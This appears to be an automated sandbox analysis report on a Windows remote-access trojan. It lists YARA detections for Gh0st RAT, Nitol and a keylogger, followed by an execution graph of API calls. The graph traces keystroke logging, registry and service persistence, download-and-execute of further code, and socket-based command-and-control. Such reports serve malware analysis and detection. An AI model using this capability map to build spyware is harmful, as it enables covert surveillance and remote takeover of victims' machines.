                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Gh0st_ee6de6bc, Description: Identifies a variant of Gh0st Rat, Source: 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_YoungLotus, Description: Yara detected Young Lotus, Source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Gh0st_ee6de6bc, Description: Identifies a variant of Gh0st Rat, Source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.2913041831.0000000002A8D000.00000040.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000003.2660700372.0000000002861000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:16:25:59
                                                                  Start date:18/10/2024
                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe"
                                                                  Imagebase:0x400000
                                                                  File size:962'560 bytes
                                                                  MD5 hash:B36366F4A27987D6DE47887B03F29C68
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Gh0st_ee6de6bc, Description: Identifies a variant of Gh0st Rat, Source: 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_YoungLotus, Description: Yara detected Young Lotus, Source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Gh0st_ee6de6bc, Description: Identifies a variant of Gh0st Rat, Source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2946883460.00000000027B9000.00000040.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:2%
                                                                    Dynamic/Decrypted Code Coverage:49.9%
                                                                    Signature Coverage:58.6%
                                                                    Total number of Nodes:684
                                                                    Total number of Limit Nodes:45
                                                                    execution_graph 53749 4023e1 53750 40240b 53749->53750 53753 401f80 53750->53753 53752 4024ae 53756 401f30 53753->53756 53755 401f8a 53755->53752 53757 401f48 53756->53757 53763 401360 53757->53763 53759 401f52 53760 401f6f 53759->53760 53777 10008e92 53759->53777 53780 100095a4 GetInputState GetCurrentThreadId PostThreadMessageA GetMessageA 53759->53780 53760->53755 53764 4013f7 53763->53764 53765 4014aa 53764->53765 53766 4014cd VirtualAlloc 53764->53766 53765->53759 53767 4014e4 53766->53767 53768 4014f8 53767->53768 53769 40150b VirtualAlloc 53767->53769 53768->53759 53770 401537 53769->53770 53846 401990 53770->53846 53775 4015b1 53775->53759 53855 1000a053 CreateEventA _beginthreadex WaitForSingleObject CloseHandle 53777->53855 53779 10008ea5 WaitForSingleObject CloseHandle 53779->53760 53856 10009563 CoInitialize CoCreateGuid 53780->53856 53782 100095dd wsprintfA GetVersionExA 53783 10009619 53782->53783 53784 1000962a 53782->53784 53859 1000a053 CreateEventA _beginthreadex WaitForSingleObject CloseHandle 53783->53859 53786 10009635 53784->53786 53787 1000963a 53784->53787 53865 100081af 10 API calls 53786->53865 53789 10009646 GetVersionExA 53787->53789 53790 100098c7 sprintf 53787->53790 53860 10007b22 LoadLibraryW 53789->53860 53874 1000712b memset memset wsprintfA 53790->53874 53793 10009944 lstrlenA 53795 10009958 53793->53795 53796 10009969 53793->53796 53877 10005437 15 API calls 53795->53877 53801 10009563 4 API calls 53796->53801 53797 100096a9 53798 100096b6 53797->53798 53799 100097e8 53797->53799 53866 10009e13 strcpy strcat RegOpenKeyExA 53798->53866 53804 100097f0 53799->53804 53805 10009a59 53799->53805 53807 10009971 wsprintfA 53801->53807 53802 10009687 CreateThread 53808 10009697 53802->53808 53902 100094e6 GetModuleFileNameA RegOpenKeyExA 53802->53902 53872 10005437 15 API calls 53804->53872 53879 1000a053 CreateEventA _beginthreadex WaitForSingleObject CloseHandle 53805->53879 53806 10009963 53812 10008206 16 API calls 53806->53812 53813 10009a03 memset GetModuleFileNameA 53807->53813 53814 1000998f 7 API calls 53807->53814 53815 10008e92 6 API calls 53808->53815 53810 100096bb 53817 100096fe ExpandEnvironmentStringsA wsprintfA strlen 53810->53817 53818 100096bf Sleep StartServiceCtrlDispatcherA Sleep StartServiceCtrlDispatcherA 53810->53818 53812->53796 53820 10009a21 Sleep 53813->53820 53814->53820 53821 1000969c Sleep 53815->53821 53816 10009a69 WaitForSingleObject CloseHandle 53816->53760 53824 10009748 strlen 53817->53824 53825 1000975c strcat strcat GetModuleFileNameA CopyFileA 53817->53825 53822 100097dc 53818->53822 53819 10009800 53823 10008206 16 API calls 53819->53823 53878 1000a053 CreateEventA _beginthreadex WaitForSingleObject CloseHandle 53820->53878 53821->53808 53830 10008e92 6 API calls 53822->53830 53827 10009806 53823->53827 53824->53825 53867 10009a83 47 API calls 53825->53867 53873 1000a44e 9 API calls 53827->53873 53829 10009a3b WaitForSingleObject CloseHandle 53834 10009a50 Sleep 53829->53834 53831 100097e1 ExitProcess 53830->53831 53833 100097bd 53868 10005437 15 API calls 53833->53868 53834->53834 53835 10009826 53837 1000982d CreateThread 53835->53837 53838 1000983f wsprintfA GetModuleFileNameA CopyFileA RegOpenKeyExA 53835->53838 53840 100098b5 53837->53840 53905 100093ac 14 API calls 53837->53905 53838->53840 53841 10009895 RegSetValueExA RegCloseKey 53838->53841 53839 100097c8 53869 10008206 wsprintfA GetLocalTime wsprintfA lstrlenA 53839->53869 53843 10008e92 6 API calls 53840->53843 53841->53840 53845 100098ba Sleep 53843->53845 53845->53840 53847 401a2a 53846->53847 53848 40158a 53847->53848 53849 401ac5 LoadLibraryA 53847->53849 53848->53775 53850 401750 53848->53850 53849->53847 53849->53848 53853 4017e4 53850->53853 53851 401597 53851->53775 53854 10009fbf URLDownloadToFileA ShellExecuteA 53851->53854 53852 401888 VirtualFree 53852->53853 53853->53851 53853->53852 53854->53775 53855->53779 53857 10009585 _snprintf 53856->53857 53858 10009599 CoUninitialize 53856->53858 53857->53858 53858->53782 53859->53784 53861 10007b65 53860->53861 53862 10007b37 GetProcAddress 53860->53862 53861->53797 53861->53802 53863 10007b47 53862->53863 53864 10007b5e FreeLibrary 53862->53864 53863->53864 53864->53861 53865->53787 53866->53810 53867->53833 53868->53839 53880 1000a87a 7 API calls 53869->53880 53872->53819 53873->53835 53891 1000a5cc 10 API calls 53874->53891 53877->53806 53878->53829 53879->53816 53881 1000a960 RegCreateKeyExA 53880->53881 53882 1000a904 53880->53882 53883 1000a907 53881->53883 53884 1000a97e RegOpenKeyExA 53881->53884 53882->53883 53882->53884 53887 1000a9e8 FreeLibrary 53883->53887 53888 100083a8 Sleep 53883->53888 53884->53883 53885 1000a995 53884->53885 53885->53883 53886 1000a9b7 lstrlenA 53885->53886 53889 1000a9ad 53885->53889 53890 1000a9c6 RegSetValueExA 53886->53890 53887->53888 53888->53822 53889->53890 53890->53883 53892 1000a6af 53891->53892 53893 1000a6a6 53891->53893 53892->53893 53894 1000a7bb RegQueryValueExA 53892->53894 53895 1000a6cc 53892->53895 53896 10007233 53893->53896 53897 1000a806 FreeLibrary 53893->53897 53894->53893 53901 1000a6dc 53894->53901 53899 1000a753 53895->53899 53895->53901 53896->53793 53897->53896 53898 1000a7e4 lstrcpyA 53898->53893 53899->53893 53900 1000a7ad wsprintfA 53899->53900 53900->53893 53901->53893 53901->53898 53903 1000953c RegSetValueExA RegCloseKey 53902->53903 53904 1000955f 53902->53904 53903->53904 53907 24be067 LdrInitializeThunk 53910 10009fef 53922 1000addc 53910->53922 53912 10009ff9 memcpy SetEvent 53913 1000a030 53912->53913 53914 1000a029 53912->53914 53923 10005d24 53913->53923 53926 10004b31 53913->53926 53947 10008bda 53913->53947 53986 10001b29 53913->53986 53995 1000a1ac 14 API calls 53914->53995 53916 1000a02f 53916->53913 53917 1000a036 53922->53912 53996 1000a053 CreateEventA _beginthreadex WaitForSingleObject CloseHandle 53923->53996 53925 10005d37 53925->53917 53927 10004b50 memset 53926->53927 53928 10004b47 53926->53928 53929 10004b97 Sleep lstrlenA 53927->53929 53928->53917 53930 10004bb0 53929->53930 53938 10004bff 53929->53938 53935 10004be2 53930->53935 53943 10004967 12 API calls 53930->53943 53997 10004a4b memset GetForegroundWindow GetWindowTextA 53930->53997 54003 10004967 6 API calls 53930->54003 53931 10004c02 GetKeyState GetAsyncKeyState 53933 10004c22 GetKeyState 53931->53933 53931->53938 53934 10004c4e GetKeyState 53933->53934 53933->53938 53934->53938 53936 10004967 12 API calls 53935->53936 53940 10004bee memset 53936->53940 53937 10004cc2 lstrlenA 53937->53938 53938->53929 53938->53931 53938->53934 53938->53937 53941 10004ce0 lstrcatA 53938->53941 53942 10004967 12 API calls 53938->53942 53946 10004d32 lstrcatA 53938->53946 53940->53938 53941->53938 53944 10004cf9 memset 53942->53944 53945 10004bcf memset 53943->53945 53944->53938 53945->53938 53946->53938 53948 10008be4 __EH_prolog 53947->53948 53949 10008bee wsprintfA CreateMutexA 53948->53949 53950 10008c30 GetLastError 53949->53950 53951 10008c52 53949->53951 53950->53951 53952 10008c3d ReleaseMutex CloseHandle exit 53950->53952 53953 10008206 16 API calls 53951->53953 53952->53951 53954 10008c58 53953->53954 54008 100018ed 53954->54008 53956 10008c61 53957 10008c6c 53956->53957 53977 10008c99 53956->53977 54055 10005d05 CreateEventA 53957->54055 53959 10008e54 54059 10001e14 setsockopt CancelIo InterlockedExchange closesocket SetEvent 53959->54059 53960 10008c7b 53964 10005d24 4 API calls 53960->53964 53961 10008cd1 strstr 53965 10008d81 strcmp 53961->53965 53966 10008d0d 6 API calls 53961->53966 53962 10008d65 lstrcatA 53962->53965 53968 10008c8a 53964->53968 53969 10008d9c GetTickCount 53965->53969 53965->53977 53966->53965 53967 10008e5c 54062 100019b4 10 API calls 2 library calls 53967->54062 54056 10005cc4 TerminateThread CloseHandle CloseHandle ctype 53968->54056 54011 10001a43 53969->54011 53973 10008e81 53973->53917 53974 10008dbf GetTickCount 54021 10005c6a 53974->54021 53977->53959 53977->53961 53977->53962 53977->53974 53978 10008e29 WaitForSingleObject Sleep 53977->53978 53983 10008e0d 53977->53983 54026 10007bf6 memset lstrcpyA 53977->54026 53978->53977 53978->53983 53980 10008e5e 54060 10001e14 setsockopt CancelIo InterlockedExchange closesocket SetEvent 53980->54060 53983->53977 53983->53980 54057 10001e14 setsockopt CancelIo InterlockedExchange closesocket SetEvent 53983->54057 54058 10005cc4 TerminateThread CloseHandle CloseHandle ctype 53983->54058 53984 10008e66 54061 10005cc4 TerminateThread CloseHandle CloseHandle ctype 53984->54061 53987 10001b36 53986->53987 53988 10001b61 select 53987->53988 53991 10001b8e memset recv 53987->53991 53993 10001be9 53987->53993 53988->53987 53989 10001beb 53988->53989 54176 10001e14 setsockopt CancelIo InterlockedExchange closesocket SetEvent 53989->54176 53991->53989 53992 10001bba 53991->53992 54175 10001c0d 35 API calls __EH_prolog 53992->54175 53993->53917 53995->53916 53996->53925 53998 10004b1f 53997->53998 53999 10004aab lstrlenA 53997->53999 53998->53930 53999->53998 54000 10004ab6 GetLocalTime wsprintfA 53999->54000 54001 10004967 12 API calls 54000->54001 54002 10004afd memset memset 54001->54002 54002->53998 54004 100049fc lstrlenA ??2@YAPAXI 54003->54004 54005 100049ef SetFilePointer 54003->54005 54006 10004a16 54004->54006 54007 10004a27 lstrlenA WriteFile CloseHandle 54004->54007 54005->54004 54006->54007 54007->53930 54009 100018f7 __EH_prolog 54008->54009 54010 10001931 WSAStartup CreateEventA memcpy 54009->54010 54010->53956 54063 10001e14 setsockopt CancelIo InterlockedExchange closesocket SetEvent 54011->54063 54013 10001a53 ResetEvent socket 54014 10001a75 gethostbyname 54013->54014 54020 10001ab5 54013->54020 54015 10001a84 htons connect 54014->54015 54014->54020 54016 10001ab9 setsockopt 54015->54016 54015->54020 54017 10001b06 54016->54017 54018 10001ad9 WSAIoctl 54016->54018 54064 1000a053 CreateEventA _beginthreadex WaitForSingleObject CloseHandle 54017->54064 54018->54017 54020->53977 54065 100069b0 54021->54065 54023 10005c76 54024 10005c92 54023->54024 54025 10005c83 lstrcpyA 54023->54025 54024->53977 54025->54024 54069 10007289 54026->54069 54028 10007c4d lstrcpyA 54074 1000723a 54028->54074 54031 10007c7d memset getsockname memcpy memcpy GetVersionExA 54032 10007b22 3 API calls 54031->54032 54033 10007d02 RegOpenKeyA RegQueryValueExA RegCloseKey 54032->54033 54079 10007105 GetSystemInfo wsprintfA 54033->54079 54035 10007d67 54080 10007b6a malloc 54035->54080 54038 10007d9e GlobalMemoryStatusEx 54040 10007dc9 54038->54040 54039 10007d8e wsprintfA 54039->54038 54041 10007dd3 GetDriveTypeA 54040->54041 54043 10007e21 54040->54043 54041->54040 54042 10007df5 GetDiskFreeSpaceExA 54041->54042 54042->54040 54087 10006fe0 7 API calls 54043->54087 54050 10007e92 54110 100072fb 54050->54110 54052 10007eb1 lstrcpyA 54115 10001e6d 54052->54115 54055->53960 54056->53977 54057->53983 54058->53983 54059->53967 54060->53984 54061->53967 54062->53973 54063->54013 54064->54020 54068 10002029 54065->54068 54067 100069c6 CreateEventA 54067->54023 54068->54067 54070 1000712b 17 API calls 54069->54070 54071 100072d8 lstrlenA 54070->54071 54072 100072f4 lstrlenA 54071->54072 54073 100072e8 lstrcpyA 54071->54073 54072->54028 54073->54072 54075 1000712b 17 API calls 54074->54075 54076 10007268 lstrlenA 54075->54076 54077 10007282 lstrlenA 54076->54077 54078 10007278 gethostname 54076->54078 54077->54031 54078->54077 54079->54035 54081 10007b8f GetIfTable 54080->54081 54086 10007bb9 wsprintfA 54080->54086 54082 10007ba9 free malloc 54081->54082 54083 10007bbe GetIfTable 54081->54083 54082->54083 54082->54086 54084 10007bce 54083->54084 54085 10007bea free 54084->54085 54084->54086 54085->54086 54086->54038 54086->54039 54092 10007050 54087->54092 54088 1000706b 54093 1000735d LoadLibraryA GetProcAddress GetProcAddress 54088->54093 54089 100070f0 FreeLibrary 54090 100070f3 54089->54090 54090->54088 54091 100070f8 FreeLibrary 54090->54091 54091->54088 54092->54088 54092->54089 54092->54090 54096 10007391 54093->54096 54094 100073a5 memset 54097 100073c4 LoadLibraryA GetProcAddress GetProcAddress GetProcAddress CreateToolhelp32Snapshot 54094->54097 54095 1000739e FreeLibrary 54095->54094 54096->54094 54096->54095 54098 10007aea CloseHandle lstrlenA 54097->54098 54099 10007a5f strstr 54097->54099 54100 10007b11 54098->54100 54101 10007b03 lstrcpyA 54098->54101 54099->54098 54102 10007a81 54099->54102 54103 10007b20 GetLastInputInfo GetTickCount 54100->54103 54104 10007b17 FreeLibrary 54100->54104 54101->54100 54105 10007a8d Process32First 54102->54105 54106 10007ace strstr 54102->54106 54107 10007a9e lstrcmpiA 54102->54107 54103->54050 54104->54103 54105->54102 54106->54098 54106->54105 54108 10007ac0 lstrcatA lstrcatA 54107->54108 54109 10007ab1 Process32Next 54107->54109 54108->54106 54109->54102 54111 1000712b 17 API calls 54110->54111 54112 1000733a lstrlenA 54111->54112 54113 10007356 lstrlenA 54112->54113 54114 1000734a lstrcpyA 54112->54114 54113->54052 54114->54113 54144 100012f1 54115->54144 54118 10001f44 54120 1000104c 8 API calls 54118->54120 54119 10001e8d ??2@YAPAXI 54121 10001f82 54119->54121 54122 10001e9f memcpy 54119->54122 54124 10001f51 54120->54124 54121->53977 54155 1000104c 54122->54155 54126 100012f1 VirtualFree 54124->54126 54128 10001f59 54126->54128 54127 1000104c 8 API calls 54129 10001ece 54127->54129 54130 1000104c 8 API calls 54128->54130 54131 1000104c 8 API calls 54129->54131 54135 10001f64 54130->54135 54132 10001edb 54131->54132 54133 1000104c 8 API calls 54132->54133 54134 10001eef 54133->54134 54136 1000104c 8 API calls 54134->54136 54147 10001f89 54135->54147 54137 10001efa ??3@YAXPAX ??2@YAPAXI memcpy 54136->54137 54139 100012f1 VirtualFree 54137->54139 54140 10001f26 54139->54140 54141 1000104c 8 API calls 54140->54141 54142 10001f33 54141->54142 54142->54135 54143 10001f39 ??3@YAXPAX 54142->54143 54143->54135 54145 10001309 54144->54145 54146 100012fb VirtualFree 54144->54146 54145->54118 54145->54119 54146->54145 54148 10001fa0 54147->54148 54151 10001fb9 54148->54151 54152 10001ff1 54148->54152 54149 10001fbd send 54149->54151 54150 10001ff8 send 54150->54152 54153 1000200f 54150->54153 54151->54149 54151->54153 54154 10001fdb Sleep 54151->54154 54152->54150 54152->54153 54153->54121 54154->54151 54154->54152 54156 10001055 54155->54156 54161 100011a4 54156->54161 54159 10001068 54159->54127 54160 1000106c memcpy 54160->54159 54162 100011b3 54161->54162 54163 10001063 54162->54163 54170 10001155 54162->54170 54163->54159 54163->54160 54165 100011db _ftol VirtualAlloc 54165->54163 54166 10001202 54165->54166 54167 10001210 memcpy 54166->54167 54168 1000121d 54166->54168 54167->54168 54168->54163 54169 10001224 VirtualFree 54168->54169 54169->54163 54171 10001176 54170->54171 54172 10001169 _ftol 54170->54172 54173 10001191 _ftol 54171->54173 54174 10001184 _ftol 54171->54174 54172->54165 54173->54165 54174->54165 54175->53987 54176->53993 54181 24be197 54183 24be1a1 54181->54183 54184 24be1a8 54183->54184 54185 24be1b6 LdrInitializeThunk 54183->54185 54186 2492657 54188 2492703 54186->54188 54187 2492874 54206 2492c00 54187->54206 54214 24929ba 54187->54214 54188->54187 54189 2494056 54188->54189 54241 2492b61 54189->54241 54328 24d30ff 54189->54328 54190 248f2b7 GetPEB 54191 24942d2 54190->54191 54193 24942d6 GetPEB 54191->54193 54198 249430e 54191->54198 54193->54198 54194 24940c7 54194->54241 54427 248f2b7 GetPEB 54194->54427 54195 247abbd 11 API calls 54197 2492b4e 54195->54197 54200 2492b52 54197->54200 54207 2492bb3 54197->54207 54332 247a709 54200->54332 54201 24930ca 54291 248bacc 54201->54291 54203 2494124 54208 249413d 54203->54208 54209 249412e GetPEB 54203->54209 54204 2494114 GetPEB 54204->54203 54206->54201 54244 2492ed6 54206->54244 54210 24931e6 GetPEB 54207->54210 54246 2493246 54207->54246 54211 248f2b7 GetPEB 54208->54211 54209->54208 54212 24931f3 GetPEB 54210->54212 54223 249320e 54210->54223 54213 2494151 54211->54213 54212->54223 54215 2494165 54213->54215 54216 2494155 GetPEB 54213->54216 54214->54195 54214->54207 54214->54241 54219 249416f GetPEB 54215->54219 54237 2494197 54215->54237 54216->54215 54218 24930ea 54218->54207 54220 247abbd 11 API calls 54218->54220 54218->54241 54224 249417e 54219->54224 54219->54237 54225 249316b 54220->54225 54221 249303b 54221->54207 54226 249303f 54221->54226 54222 248f2b7 GetPEB 54228 24941b9 54222->54228 54229 2493237 GetPEB 54223->54229 54230 248f2b7 GetPEB 54224->54230 54225->54207 54231 249316f 54225->54231 54232 247a709 51 API calls 54226->54232 54227 2493fbe GetPEB 54227->54241 54233 24941cd 54228->54233 54234 24941bd GetPEB 54228->54234 54229->54246 54235 2494183 54230->54235 54236 247a709 51 API calls 54231->54236 54232->54241 54242 248f2b7 GetPEB 54233->54242 54247 24941f0 54233->54247 54234->54233 54235->54237 54238 2494187 GetPEB 54235->54238 54236->54241 54237->54222 54238->54237 54239 2493f7e GetPEB 54239->54241 54240 2493f24 54240->54239 54241->54190 54245 24941dc 54242->54245 54243 2494227 GetPEB 54243->54241 54244->54207 54244->54241 54259 247abbd 54244->54259 54245->54247 54248 24941e0 GetPEB 54245->54248 54246->54241 54249 247abbd 11 API calls 54246->54249 54251 2493b8e 54246->54251 54253 247a709 51 API calls 54246->54253 54255 24932d3 54246->54255 54247->54243 54248->54247 54249->54246 54250 2493c46 54250->54255 54416 248c197 54250->54416 54251->54250 54254 2493be9 GetPEB 54251->54254 54253->54246 54256 2493bf6 GetPEB 54254->54256 54257 2493c11 54254->54257 54255->54227 54255->54240 54255->54241 54256->54257 54258 2493c37 GetPEB 54257->54258 54258->54250 54265 247abde 54259->54265 54260 24d996a 54261 24d996f GetPEB 54260->54261 54262 24d9985 GetPEB 54261->54262 54290 247ac98 54261->54290 54262->54290 54264 247ac2c 54264->54261 54266 247ac36 54264->54266 54265->54260 54268 247ac3b 54265->54268 54429 24be187 LdrInitializeThunk 54265->54429 54267 248f2b7 GetPEB 54266->54267 54267->54268 54269 24d99e8 GetPEB 54268->54269 54270 247ac48 54268->54270 54272 24d99fb GetPEB 54269->54272 54271 247ac53 54270->54271 54270->54272 54273 248f2b7 GetPEB 54271->54273 54272->54271 54274 247ac68 54273->54274 54275 247ac70 54274->54275 54276 24d9a24 GetPEB 54274->54276 54277 24d9a37 GetPEB 54275->54277 54286 247ac7b 54275->54286 54276->54277 54278 24d9a4a 54277->54278 54277->54286 54280 248f2b7 GetPEB 54278->54280 54279 248f2b7 GetPEB 54281 247ac80 54279->54281 54282 24d9a4f 54280->54282 54283 247ac8d 54281->54283 54284 24d9a81 GetPEB 54281->54284 54285 24d9a53 GetPEB 54282->54285 54282->54286 54287 248f2b7 GetPEB 54283->54287 54283->54290 54284->54283 54285->54286 54286->54279 54288 24d9a99 54287->54288 54289 24d9a9d GetPEB 54288->54289 54288->54290 54289->54290 54290->54221 54292 248baf6 54291->54292 54293 248bafa 54292->54293 54296 248bb3c 54292->54296 54295 248c197 20 API calls 54293->54295 54327 248bb1a 54295->54327 54298 248bbb3 54296->54298 54302 24e04cd 54296->54302 54430 24be187 LdrInitializeThunk 54296->54430 54300 248bbbd 54298->54300 54432 24be187 LdrInitializeThunk 54298->54432 54300->54302 54300->54327 54431 24be187 LdrInitializeThunk 54300->54431 54302->54327 54433 2523326 61 API calls 54302->54433 54303 248bc12 54303->54302 54304 248bc52 54303->54304 54305 248bc4d 54303->54305 54307 24e04e5 GetPEB 54304->54307 54309 248bc64 54304->54309 54306 248f2b7 GetPEB 54305->54306 54306->54304 54308 24e04f5 GetPEB 54307->54308 54310 24e0508 54308->54310 54320 248bc6f 54308->54320 54309->54308 54309->54320 54313 248f2b7 GetPEB 54310->54313 54311 248f2b7 GetPEB 54312 248bc74 54311->54312 54314 24e054b GetPEB 54312->54314 54315 248bc86 54312->54315 54316 24e051c 54313->54316 54317 24e055b 54314->54317 54315->54317 54318 248bc91 54315->54318 54316->54320 54321 24e0520 GetPEB 54316->54321 54322 248f2b7 GetPEB 54317->54322 54319 248f2b7 GetPEB 54318->54319 54324 248bc96 54319->54324 54320->54311 54321->54320 54323 24e0560 54322->54323 54323->54324 54325 24e0564 GetPEB 54323->54325 54326 24e058f GetPEB 54324->54326 54324->54327 54325->54324 54326->54327 54327->54218 54329 24d3126 54328->54329 54434 24be187 LdrInitializeThunk 54329->54434 54331 24d313c 54331->54194 54334 247a737 54332->54334 54343 247a7f8 54332->54343 54333 248c197 20 API calls 54410 247a7bd 54333->54410 54336 247a796 54334->54336 54334->54343 54368 247a7c6 54334->54368 54335 247aaa1 54341 247aaae 54335->54341 54342 24d94d2 GetPEB 54335->54342 54337 248c197 20 API calls 54336->54337 54339 247a79e 54337->54339 54338 247a922 54340 24d97ae GetPEB 54338->54340 54367 247a92a 54338->54367 54339->54410 54435 247acb7 54339->54435 54348 24d97c1 GetPEB 54340->54348 54345 24d9530 54341->54345 54346 247aadd 54341->54346 54344 24d94de GetPEB 54342->54344 54352 24d94f8 54342->54352 54343->54335 54349 247a89d 54343->54349 54356 247aa30 54343->54356 54344->54352 54351 24d990c GetPEB 54345->54351 54345->54368 54345->54410 54355 247aaf8 54346->54355 54346->54368 54354 247a938 54348->54354 54349->54338 54349->54345 54349->54354 54358 248f2b7 GetPEB 54349->54358 54349->54368 54350 247a948 54360 248c197 20 API calls 54350->54360 54353 24d9918 GetPEB 54351->54353 54366 24d9932 54351->54366 54352->54341 54439 253b6ac 16 API calls 54352->54439 54353->54366 54354->54350 54354->54356 54359 24d97f5 GetPEB 54354->54359 54361 248f2b7 GetPEB 54355->54361 54357 248c197 20 API calls 54356->54357 54357->54350 54358->54338 54363 24d9800 GetPEB 54359->54363 54377 24d981a 54359->54377 54364 247a975 54360->54364 54365 247aafd 54361->54365 54363->54377 54369 248f2b7 GetPEB 54364->54369 54370 24d957f GetPEB 54365->54370 54371 247ab0a 54365->54371 54366->54368 54442 253b6ac 16 API calls 54366->54442 54367->54348 54367->54354 54368->54333 54372 247a97a 54369->54372 54374 24d9592 GetPEB 54370->54374 54373 247ab15 54371->54373 54371->54374 54375 247a987 54372->54375 54376 24d986c GetPEB 54372->54376 54385 247ab7e 54373->54385 54392 24d9617 GetPEB 54373->54392 54398 24d9667 54373->54398 54374->54373 54379 24d987f GetPEB 54375->54379 54380 247a992 54375->54380 54376->54379 54377->54356 54441 253b6ac 16 API calls 54377->54441 54379->54380 54382 24d9894 54379->54382 54381 248f2b7 GetPEB 54380->54381 54384 247a997 54381->54384 54383 248f2b7 GetPEB 54382->54383 54387 24d9899 54383->54387 54388 24d98cd GetPEB 54384->54388 54389 247a9a4 54384->54389 54390 248f2b7 GetPEB 54385->54390 54387->54380 54391 24d989d GetPEB 54387->54391 54388->54389 54399 248f2b7 GetPEB 54389->54399 54389->54410 54393 247ab83 54390->54393 54391->54380 54395 24d9622 GetPEB 54392->54395 54401 24d963c 54392->54401 54396 24d96d6 GetPEB 54393->54396 54397 247ab8b 54393->54397 54394 248c197 20 API calls 54394->54385 54395->54401 54400 24d96e9 GetPEB 54396->54400 54397->54400 54412 247ab96 54397->54412 54398->54394 54399->54345 54403 24d96fe 54400->54403 54400->54412 54401->54398 54440 253b6ac 16 API calls 54401->54440 54402 248f2b7 GetPEB 54404 247ab9b 54402->54404 54405 248f2b7 GetPEB 54403->54405 54406 24d973d GetPEB 54404->54406 54407 247abad 54404->54407 54408 24d9703 54405->54408 54406->54407 54407->54410 54413 248f2b7 GetPEB 54407->54413 54411 24d9707 GetPEB 54408->54411 54408->54412 54410->54241 54411->54412 54412->54402 54414 24d9752 54413->54414 54414->54410 54415 24d9756 GetPEB 54414->54415 54415->54410 54419 248c1b4 54416->54419 54426 248c2f7 54416->54426 54417 24e0a4c GetPEB 54418 24e0a58 GetPEB 54417->54418 54417->54419 54418->54419 54419->54417 54421 248c2e3 54419->54421 54419->54426 54472 253b6ac 16 API calls 54419->54472 54422 24e0b0d GetPEB 54421->54422 54421->54426 54423 24e0b19 GetPEB 54422->54423 54424 24e0b33 54422->54424 54423->54424 54424->54426 54473 253b6ac 16 API calls 54424->54473 54426->54255 54428 248f2c4 54427->54428 54428->54203 54428->54204 54429->54264 54430->54298 54431->54303 54432->54298 54433->54327 54434->54331 54437 247acd0 54435->54437 54436 247ad34 54436->54410 54437->54436 54443 247ad51 54437->54443 54439->54341 54440->54398 54441->54356 54442->54368 54447 247ad78 54443->54447 54453 247adc1 54443->54453 54444 24d9b3c GetPEB 54445 24d9b4f GetPEB 54444->54445 54446 247add9 54445->54446 54451 248f2b7 GetPEB 54446->54451 54448 24d9c21 GetPEB 54447->54448 54450 248f2b7 GetPEB 54447->54450 54452 247ae29 54447->54452 54449 24d9c2d GetPEB 54448->54449 54448->54452 54449->54452 54450->54453 54454 247adf9 54451->54454 54452->54437 54453->54444 54457 247adce 54453->54457 54455 247ae01 54454->54455 54456 24d9b76 GetPEB 54454->54456 54458 24d9b89 GetPEB 54455->54458 54467 247ae0c 54455->54467 54456->54458 54457->54445 54457->54446 54460 24d9b9c 54458->54460 54458->54467 54459 248f2b7 GetPEB 54461 247ae11 54459->54461 